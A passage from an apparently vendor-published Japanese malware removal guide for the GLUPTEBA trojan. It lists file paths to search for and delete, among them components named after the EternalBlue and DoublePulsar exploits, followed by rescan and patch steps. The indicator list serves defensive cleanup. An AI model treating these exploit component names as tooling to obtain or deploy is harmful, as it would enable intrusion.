      • %User Temp%\csrss\smb\payload64.dll
      • %User Temp%\csrss\smb\pcla-0.dll
      • %User Temp%\csrss\smb\pcre-0.dll
      • %User Temp%\csrss\smb\pcrecpp-0.dll
      • %User Temp%\csrss\smb\pcreposix-0.dll
      • %User Temp%\csrss\smb\posh-0.dll
      • %User Temp%\csrss\smb\posh.dll
      • %User Temp%\csrss\smb\pytrch.py
      • %User Temp%\csrss\smb\pytrch.pyc
      • %User Temp%\csrss\smb\riar-2.dll
      • %User Temp%\csrss\smb\riar.dll
      • %User Temp%\csrss\smb\ssleay32.dll
      • %User Temp%\csrss\smb\tibe-1.dll
      • %User Temp%\csrss\smb\tibe-2.dll
      • %User Temp%\csrss\smb\tibe.dll
      • %User Temp%\csrss\smb\trch-0.dll
      • %User Temp%\csrss\smb\trch-1.dll
      • %User Temp%\csrss\smb\trch.dll
      • %User Temp%\csrss\smb\trfo-0.dll
      • %User Temp%\csrss\smb\trfo-2.dll
      • %User Temp%\csrss\smb\trfo.dll
      • %User Temp%\csrss\smb\tucl-1.dll
      • %User Temp%\csrss\smb\tucl.dll
      • %User Temp%\csrss\smb\ucl.dll
      • %User Temp%\csrss\smb\xdvl-0.dll
      • %User Temp%\csrss\smb\zibe.dll
      • %User Temp%\csrss\smb\zlib1.dll
      • %User Temp%\csrss\smb\_pytrch.pyd
    3. [探す場所]の一覧から[マイコンピュータ]を選択し、[検索]を押します。
    4. 検索が終了したら、ファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
      註:ファイル名の入力欄のタイトルは、Windowsのバージョンによって異なります。(例:ファイルやフォルダ名の検索の場合やファイル名のすべてまたは一部での検索)

  • Windows Vista、7、Server 2008、8、8.1 および Server 2012 の場合:

    1. Windowsエクスプローラ画面を開きます。
      • Windows Vista、7 および Server 2008 の場合:
        • [スタート]-[コンピューター]を選択します。
      • Windows 8、8.1 および Server 2012 の場合:
        • 画面の左下隅を右クリックし、[エクスプローラー]を選択します。
    2. [コンピューターの検索]に、以下を入力します。
      • %System%\drivers\winmon.sys
      • %System%\drivers\WinmonFS.sys
      • %System%\drivers\WinmonProcessMonitor.sys
      • %User temp%\wup\wup.exe
      • %User temp%\wup\wupv.exe
      • %User Temp%\csrss\scheduled.exe
      • %User Temp%\csrss\cloudnet.exe
      • %User temp%\csrss\vc.exe
      • %Windows%\windefender.exe
      • %User Temp%\csrss\smb\adfw-2.dll
      • %User Temp%\csrss\smb\adfw.dll
      • %User Temp%\csrss\smb\cnli-0.dll
      • %User Temp%\csrss\smb\cnli-1.dll
      • %User Temp%\csrss\smb\coli-0.dll
      • %User Temp%\csrss\smb\crli-0.dll
      • %User Temp%\csrss\smb\dmgd-1.dll
      • %User Temp%\csrss\smb\dmgd-4.dll
      • %User Temp%\csrss\smb\Doublepulsar-1.3.1.exe
      • %User Temp%\csrss\smb\esco-0.dll
      • %User Temp%\csrss\smb\Eternalblue-2.2.0.exe
      • %User Temp%\csrss\smb\exma-1.dll
      • %User Temp%\csrss\smb\exma.dll
      • %User Temp%\csrss\smb\iconv.dll
      • %User Temp%\csrss\smb\libcurl.dll
      • %User Temp%\csrss\smb\libeay32.dll
      • %User Temp%\csrss\smb\libiconv-2.dll
      • %User Temp%\csrss\smb\libxml2.dll
      • %User Temp%\csrss\smb\payload32.dll
      • %User Temp%\csrss\smb\payload64.dll
      • %User Temp%\csrss\smb\pcla-0.dll
      • %User Temp%\csrss\smb\pcre-0.dll
      • %User Temp%\csrss\smb\pcrecpp-0.dll
      • %User Temp%\csrss\smb\pcreposix-0.dll
      • %User Temp%\csrss\smb\posh-0.dll
      • %User Temp%\csrss\smb\posh.dll
      • %User Temp%\csrss\smb\pytrch.py
      • %User Temp%\csrss\smb\pytrch.pyc
      • %User Temp%\csrss\smb\riar-2.dll
      • %User Temp%\csrss\smb\riar.dll
      • %User Temp%\csrss\smb\ssleay32.dll
      • %User Temp%\csrss\smb\tibe-1.dll
      • %User Temp%\csrss\smb\tibe-2.dll
      • %User Temp%\csrss\smb\tibe.dll
      • %User Temp%\csrss\smb\trch-0.dll
      • %User Temp%\csrss\smb\trch-1.dll
      • %User Temp%\csrss\smb\trch.dll
      • %User Temp%\csrss\smb\trfo-0.dll
      • %User Temp%\csrss\smb\trfo-2.dll
      • %User Temp%\csrss\smb\trfo.dll
      • %User Temp%\csrss\smb\tucl-1.dll
      • %User Temp%\csrss\smb\tucl.dll
      • %User Temp%\csrss\smb\ucl.dll
      • %User Temp%\csrss\smb\xdvl-0.dll
      • %User Temp%\csrss\smb\zibe.dll
      • %User Temp%\csrss\smb\zlib1.dll
      • %User Temp%\csrss\smb\_pytrch.pyd
    3. ファイルが表示されたら、そのファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
      註:Windows 7 において上記の手順が正しく行われない場合、マイクロソフトのWebサイトをご確認ください。

手順 9

以下のフォルダを検索し削除します。

[ 詳細 ]
フォルダが隠しフォルダ属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • %User Temp%\csrss
  • %Windows%\rss

手順 10

コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「Trojan.Win32.GLUPTEBA.AFJK」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

手順 11

以下の修正パッチをダウンロードし適用します。この脆弱性に対する修正パッチを適用するまで、該当製品の使用をお控えください。この製品の製造元が公開する正式な修正パッチをダウンロードし適用することをお勧めします。

手順 12

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.Win32.GLUPTEBA.AFJK」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください